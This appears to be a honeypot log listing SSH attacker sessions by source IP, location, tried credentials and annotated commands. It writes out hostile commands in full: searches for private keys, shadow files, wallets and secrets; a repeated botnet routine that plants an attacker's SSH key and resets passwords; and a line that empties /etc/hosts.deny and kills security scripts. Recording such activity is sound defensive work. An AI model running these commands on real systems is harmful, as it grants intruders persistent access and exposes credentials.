$ echo "---RC_LOCAL_TYPE---"; strings /etc/rc.local 2>/dev/null | head -30; echo "---INIT_SCRIPTS---"; for f in /etc/init.d/*; do echo "--- $f ---"; cat "$f" 2>/dev/null | grep -v "^#" | grep -v "^$" | head -10; done; echo "---FIND_EJABBERD_CONFIG---"; find / -maxdepth 5 -name "ejabberd*" 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---FIND_MYSQL_CONFIG---"; find / -maxdepth 5 -name "my.cnf" -o -name "mysqld*" 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---FIND_EXIM_CONFIG---"; find / -maxdepth 5 -name "exim*" 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---FIND_VBOX_GUEST---"; find / -maxdepth 4 -name "*vbox*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---FIND_VALET/DOCKER/ANY_RUNTIME---"; ls -la /var/run/ 2>/dev/null | head -30; echo "---DONE---"
$ echo "---RC_LOCAL_CONTENTS---"; cat /etc/rc.local 2>/dev/null; echo "---FIND_NFS---"; cat /etc/fstab 2>/dev/null; echo "---FIND_MOUNTS---"; mount 2>/dev/null; echo "---FIND_ANY_NFS---"; cat /etc/exports 2>/dev/null; echo "---FIND_NETWORK_CONF---"; cat /etc/network/interfaces 2>/dev/null; echo "---FIND_KVM_VBOX---"; lsmod 2>/dev/null; echo "---FIND_VBOX_GUEST---"; ls /usr/lib/virtualbox/ 2>/dev/null; echo "---FIND_VBOX_CONFIG---"; cat /etc/vbox/VBoxNet.conf 2>/dev/null; echo "---FIND_DB_FILES---"; find / -maxdepth 5 -type f \( -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" \) 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---FIND_CONFIG_FILES_CONTENTS---"; grep -r -l "password\|secret\|api_key\|apikey\|token\|private" /etc/ 2>/dev/null | grep -v -E "/proc|/sys|/usr/share|/etc/ssl|/etc/pam" | head -30; echo "---DONE---"
$ echo "---PYTHON_VERSION---"; python --version 2>&1; echo "---WHAT_PYTHON_IS---"; which python; file $(which python); echo "---INITDB---"; ls /etc/init.d/ | sort; echo "---UPSTART---"; ls /etc/init/ 2>/dev/null; echo "---FIND_SCRIPTS---"; find / -maxdepth 4 -type f -name "*.py" 2>/dev/null | grep -v -E "/usr/lib|/usr/share|/proc|/sys"; find / -maxdepth 4 -type f -name "*.sh" 2>/dev/null | grep -v -E "/usr/lib|/usr/share|/proc|/sys"; echo "---FIND_PHP---"; find / -maxdepth 4 -type f -name "*.php" 2>/dev/null | grep -v -E "/usr/lib|/usr/share|/proc|/sys|/usr/local"; echo "---FIND_RC_LOCAL---"; cat /etc/rc.local 2>/dev/null; echo "---FIND_ANYTHING_RECENT---"; find / -maxdepth 5 -type f -mtime -365 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share|/usr/local/lib|dpkg|apt|log|cache" | head -100; echo "---SYSCTL---"; cat /etc/sysctl.conf 2>/dev/null | grep -v "^#" | grep -v "^$"; echo "---DONE---"
$ which python
$ echo "---MYSQL_SOCKET---"; ls -la /var/run/mysqld/ 2>/dev/null; ls -la /tmp/mysql* 2>/dev/null; echo "---MYSQL_PROC---"; ps aux | grep mysql; echo "---EJABBERD_PROC---"; ps aux | grep ejabberd; echo "---EXIM_PROC---"; ps aux | grep exim; echo "---ALL_LISTENING---"; ss -tlnp 2>/dev/null; echo "---ALL_LISTENING2---"; netstat -tlnp 2>/dev/null; echo "---NETSTAT_ALL---"; netstat -anp 2>/dev/null | head -50; echo "---MYSQL_DATA_DIR---"; ls -la /var/lib/mysql/ 2>/dev/null || echo "empty or no access"; echo "---PHPMYADMIN---"; ls -la /var/www/phpmyadmin/ 2>/dev/null || echo "no phpmyadmin"; echo "---MYSQL_BACKUPS---"; find / -maxdepth 3 -name "*.sql" 2>/dev/null; echo "---DONE---" // execute from /tmp
$ echo "---MYSQL---"; cat /etc/mysql/my.cnf 2>/dev/null | grep -v "^#" | grep -v "^$"; ls /etc/mysql/conf.d/ 2>/dev/null; echo "---MYSQL_DATA---"; ls /var/lib/mysql/ 2>/dev/null; echo "---EJABBERD---"; cat /etc/ejabberd/ejabberd.cfg 2>/dev/null | head -80; echo "---EJABBERD2---"; cat /etc/ejabberd/ejabberd.yml 2>/dev/null | head -80; echo "---PHIL_HOME---"; ls -la /home/phil/ 2>/dev/null; cat /home/phil/.bashrc 2>/dev/null; cat /home/phil/.bash_history 2>/dev/null; echo "---WWW---"; ls -laR /var/www/ 2>/dev/null | head -50; echo "---MAIL---"; ls -la /var/mail/ 2>/dev/null; ls -la /var/spool/mail/ 2>/dev/null; echo "---EXIM---"; cat /etc/exim4/exim4.conf.localmacros 2>/dev/null | head -30; echo "---NETWORK---"; netstat -tlnp 2>/dev/null; echo "---DONE---" // history snooping
$ cat /root/.ssh/authorized_keys 2>/dev/null; echo "---SSH_DONE---"; cat /root/.ssh/id_rsa 2>/dev/null; echo "---KEY_DONE---" // SSH key persistence
$ ps aux; echo "---PROC_DONE---"; ls -la /root/ 2>/dev/null; echo "---ROOT_DONE---"; ls -la /opt/ 2>/dev/null; echo "---OPT_DONE---"; ls -la /srv/ 2>/dev/null; echo "---SRV_DONE---"; ls -la /var/www/ 2>/dev/null; echo "---WWW_DONE---"; cat /etc/passwd; echo "---PASSWD_DONE---" // user enumeration
$ find / -maxdepth 5 -type f -name "*.conf" 2>/dev/null | grep -v -E "/proc/|/sys/|/usr/share|/usr/lib|/usr/share/doc|dpkg" | head -50; echo "---CONF_DONE---"
$ find / -maxdepth 5 -type f \( -name "*.txt" -o -name "*.md" -o -name "*.csv" -o -name "*.json" -o -name "*.yml" -o -name "*.yaml" -o -name "*.conf" -o -name "*.cfg" -o -name "*.ini" \) 2>/dev/null | grep -v -E "/proc/|/sys/|/usr/share|/usr/lib|/usr/share/doc|dpkg" | head -100; echo "---CONF_DONE---"
$ find / -maxdepth 4 -type f -name "*.env" -o -name ".env" -o -name "*.pem" -o -name "*.key" -o -name "*.crt" -o -name "*.p12" -o -name "*.pfx" -o -name "*.kdbx" -o -name "wallet.dat" -o -name "*.wallet" 2>/dev/null; echo "---FILE_LIST_DONE---"
$ echo "=== ANY FILE WITH PASSWORD IN / ==="; find / -maxdepth 4 -type f \( -name "*.env" -o -name ".env" -o -name "*.pem" -o -name "*.key" -o -name "*.crt" -o -name "*.p12" -o -name "*.pfx" -o -name "*.kdbx" -o -name "wallet.dat" -o -name "*.wallet" \) 2>/dev/null; echo "=== TEXT FILES WITH mnemonic OR seed OR wallet ==="; find / -maxdepth 5 -type f -name "*.txt" -o -name "*.md" -o -name "*.csv" -o -name "*.json" -o -name "*.yml" -o -name "*.yaml" -o -name "*.conf" 2>/dev/null | head -100; echo "=== CHECK COMMON SECRETS PATHS ==="; ls -la /root/ 2>/dev/null || echo "cannot read /root"; ls -la /opt/ 2>/dev/null || echo "cannot read /opt"; ls -la /srv/ 2>/dev/null || echo "cannot read /srv"; ls -la /var/www/ 2>/dev/null || echo "cannot read /var/www"; echo "=== USER HOME DIRS ==="; cat /etc/passwd; echo "=== CHECK ANY SSH KEYS ON SYSTEM ==="; find / -maxdepth 4 -name "id_*" -o -name "known_hosts" -o -name "ssh_config" 2>/dev/null; echo "=== CHECK /ETC/SHADOW ==="; cat /etc/shadow 2>/dev/null | head -20 || echo "cannot read /etc/shadow"; echo "=== CHECK FOR ANY DATABASE FILES ==="; find / -maxdepth 4 \( -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" -o -name "*.sql" \) 2>/dev/null; echo "=== CHECK FOR NODE/JS PROJECTS ==="; find / -maxdepth 4 -name "package.json" 2>/dev/null; echo "=== CHECK FOR PYTHON PROJECTS ==="; find / -maxdepth 4 -name "requirements.txt" 2>/dev/null; echo "=== CHECK FOR VIRTUAL HOSTS ==="; ls -la /etc/nginx/ 2>/dev/null || echo "no nginx"; ls -la /etc/apache2/ 2>/dev/null || echo "no apache"; ls -la /etc/lighttpd/ 2>/dev/null || echo "no lighttpd"; echo "=== CHECK FOR ANY RUNNING PROCESSES ==="; ps aux 2>/dev/null; echo "=== DONE ===" // user enumeration
$ echo "=== INSTALLED PACKAGES ==="; dpkg -l 2>/dev/null | head -100; echo "=== WHICH COMMANDS ==="; which python node npm docker mongod redis mysql psql tmux screen git curl wget 2>/dev/null; echo "=== /tmp ==="; ls -la /tmp/ 2>/dev/null | head -30; echo "=== /var/log ==="; ls -la /var/log/ 2>/dev/null | head -30; echo "=== /etc/cron* ==="; ls -la /etc/cron* 2>/dev/null; cat /etc/crontab 2>/dev/null; echo "=== SYSTEMD ==="; ls /etc/init.d/ 2>/dev/null; echo "=== NETWORK ==="; route -n 2>/dev/null; cat /etc/resolv.conf 2>/dev/null; cat /etc/hosts 2>/dev/null; echo "=== /etc/ssh ==="; cat /etc/ssh/sshd_config 2>/dev/null | grep -v "^#" | grep -v "^$"; echo "=== /etc/hostname ==="; cat /etc/hostname 2>/dev/null; echo "=== /etc/os-release ==="; cat /etc/issue 2>/dev/null // persistence setup
$ echo OK
$ echo Muddy2!@#2wsx | sudo -S echo SUDO_OK
$ echo '=== .SSH DIR ==='; ls -la ~/.ssh/ 2>/dev/null || echo 'no .ssh'; echo '=== SSH KEYS ==='; cat ~/.ssh/id_* 2>/dev/null || echo 'no private keys'; cat ~/.ssh/authorized_keys 2>/dev/null || echo 'no authorized_keys'; echo '=== ENV VARS ==='; env | sort; echo '=== HOME FILES ==='; ls -la ~/; echo '=== HOME DIRS ==='; find ~ -maxdepth 3 -type f -name '*.env' -o -name '.env' -o -name '*.pem' -o -name '*.key' -o -name '*.crt' -o -name '*.pem' -o -name 'wallet*' -o -name 'mnemonic*' -o -name 'seed*' -o -name '*.kdbx' -o -name 'keystore*' -o -name '.passwords*' -o -name '*.txt' -o -name 'credentials*' 2>/dev/null | head -50; echo '=== RECENT FILES ==='; find ~ -maxdepth 3 -type f -mtime -90 2>/dev/null | head -50; echo '=== SUDO PASSWD ==='; sudo -S echo SUDO_WORKED <<< 'Muddy2!@#2wsx' 2>&1 // password change attempt
$ echo '=== SYSTEM INFO ==='; uname -a; hostname; echo '=== WHOAMI ==='; whoami; id; echo '=== SUDO ACCESS ==='; sudo -l 2>/dev/null; echo '=== USERS ==='; cat /etc/passwd | grep -v nologin | grep -v false; echo '=== LISTENING PORTS ==='; ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null; echo '=== RUNNING SERVICES ==='; systemctl list-units --type=service --state=running 2>/dev/null | head -60; echo '=== CRONTAB ==='; crontab -l 2>/dev/null; echo '=== DOCKER ==='; docker ps -a 2>/dev/null || echo 'no docker'; echo '=== MOUNTS ==='; df -h 2>/dev/null; echo '=== IP ADDRESSES ==='; ip addr show 2>/dev/null | grep 'inet '; echo '=== LAST LOGIN ==='; last -5 2>/dev/null; echo '=== BASH HISTORY ==='; cat ~/.bash_history 2>/dev/null | tail -80; echo '=== END ===' // user enumeration
$ echo OK_Muddy2!@#2wsx
🎭 wraith_root_109 (43.160.242.74) β€” Singapore, Singapore Β· 2 sessions Β· 22 cmds
2026-05-07 09:24 EDT Β· as tester/tester123456, ttest/ttest
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ttest\n5kDaZ7jMpOFC\n5kDaZ7jMpOFC"|passwd|bash
$ Enter new UNIX password:
$ echo "ttest\n5kDaZ7jMpOFC\n5kDaZ7jMpOFC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_24 (93.39.209.147) β€” Milan, Italy Β· 1 session Β· 20 cmds
2026-05-07 09:36 EDT Β· as ts3user/ts3user
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ts3user\nWrxbLfpKmnXj\nWrxbLfpKmnXj"|passwd|bash
$ Enter new UNIX password:
$ echo "ts3user\nWrxbLfpKmnXj\nWrxbLfpKmnXj\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_67 (209.99.189.177) β€” San Francisco, United States Β· 1 session Β· 2 cmds
2026-05-07 09:36 EDT Β· as es/12345
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 ghost_root_25 (186.31.95.163) β€” BogotΓ‘, Colombia Β· 1 session Β· 20 cmds
2026-05-07 09:25 EDT Β· as es/123321
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123321\nMKVCkZF0BXjl\nMKVCkZF0BXjl"|passwd|bash
$ Enter new UNIX password:
$ echo "123321\nMKVCkZF0BXjl\nMKVCkZF0BXjl\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_107 (5.225.77.139) β€” Madrid, Spain Β· 1 session Β· 20 cmds
2026-05-07 09:23 EDT Β· as internet/test
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "test\nimpwrdqjD1Uu\nimpwrdqjD1Uu"|passwd|bash
$ Enter new UNIX password:
$ echo "test\nimpwrdqjD1Uu\nimpwrdqjD1Uu\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_15 (41.242.115.84) β€” Accra, Ghana Β· 1 session Β· 20 cmds
2026-05-07 09:23 EDT Β· as tester/tester123456
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "tester123456\nVZK43NaYOTH8\nVZK43NaYOTH8"|passwd|bash
$ Enter new UNIX password:
$ echo "tester123456\nVZK43NaYOTH8\nVZK43NaYOTH8\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_16 (5.89.75.194) β€” Milan, Italy Β· 1 session Β· 20 cmds
2026-05-07 09:05 EDT Β· as internet/test
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "test\n7pb7OwHr516J\n7pb7OwHr516J"|passwd|bash
$ Enter new UNIX password:
$ echo "test\n7pb7OwHr516J\n7pb7OwHr516J\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tsar_root_11 (109.248.203.154) β€” Moscow, Russia Β· 3 sessions Β· 3 cmds
2026-05-06 15:19 EDT Β· as root/blackcat, root/mail98
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 monsoon_root_23 (205.254.166.227) β€” Bengaluru, India Β· 1 session Β· 20 cmds
2026-05-07 08:31 EDT Β· as test2/123qwe
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123qwe\n3Vqqd5bUe7df\n3Vqqd5bUe7df"|passwd|bash
$ Enter new UNIX password:
$ echo "123qwe\n3Vqqd5bUe7df\n3Vqqd5bUe7df\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_123 (203.147.73.232) β€” Noumea, New Caledonia Β· 3 sessions Β· 3 cmds
2026-05-06 12:45 EDT Β· as root/Cryptolendify@2021!!, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 star_root_50 (20.88.55.220) β€” Chicago, United States Β· 1 session Β· 19 cmds
2026-05-07 07:57 EDT Β· as root/test@test
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:mKHgOXbAqtCg"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chai_root_22 (139.59.33.135) β€” Bengaluru, India Β· 2 sessions Β· 2 cmds
2026-05-06 15:20 EDT Β· as root/blackcat, ubuntu/@Cryptolendify@2026
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 gouda_sol_9 (80.94.92.182) β€” Amsterdam, The Netherlands Β· 1 session Β· 1 cmd
2026-05-07 07:34 EDT Β· as ubuntu/ubuntu123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m // obfuscated system check
🎭 crepe_root_16 (185.188.249.99) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-07 07:16 EDT Β· as ubuntu/Cryptolendify~123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 eagle_root_7 (47.77.176.155) β€” Minkler, United States Β· 1 session Β· 1 cmd
2026-05-07 06:42 EDT Β· as netweb/netweb
grep
$ grep -c ^processor /proc/cpuinfo
🎭 rogue_root_120 (115.78.7.199) β€” Ho Chi Minh City, Vietnam Β· 3 sessions Β· 3 cmds
2026-05-06 14:15 EDT Β· as root/Cryptolendify$2022, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
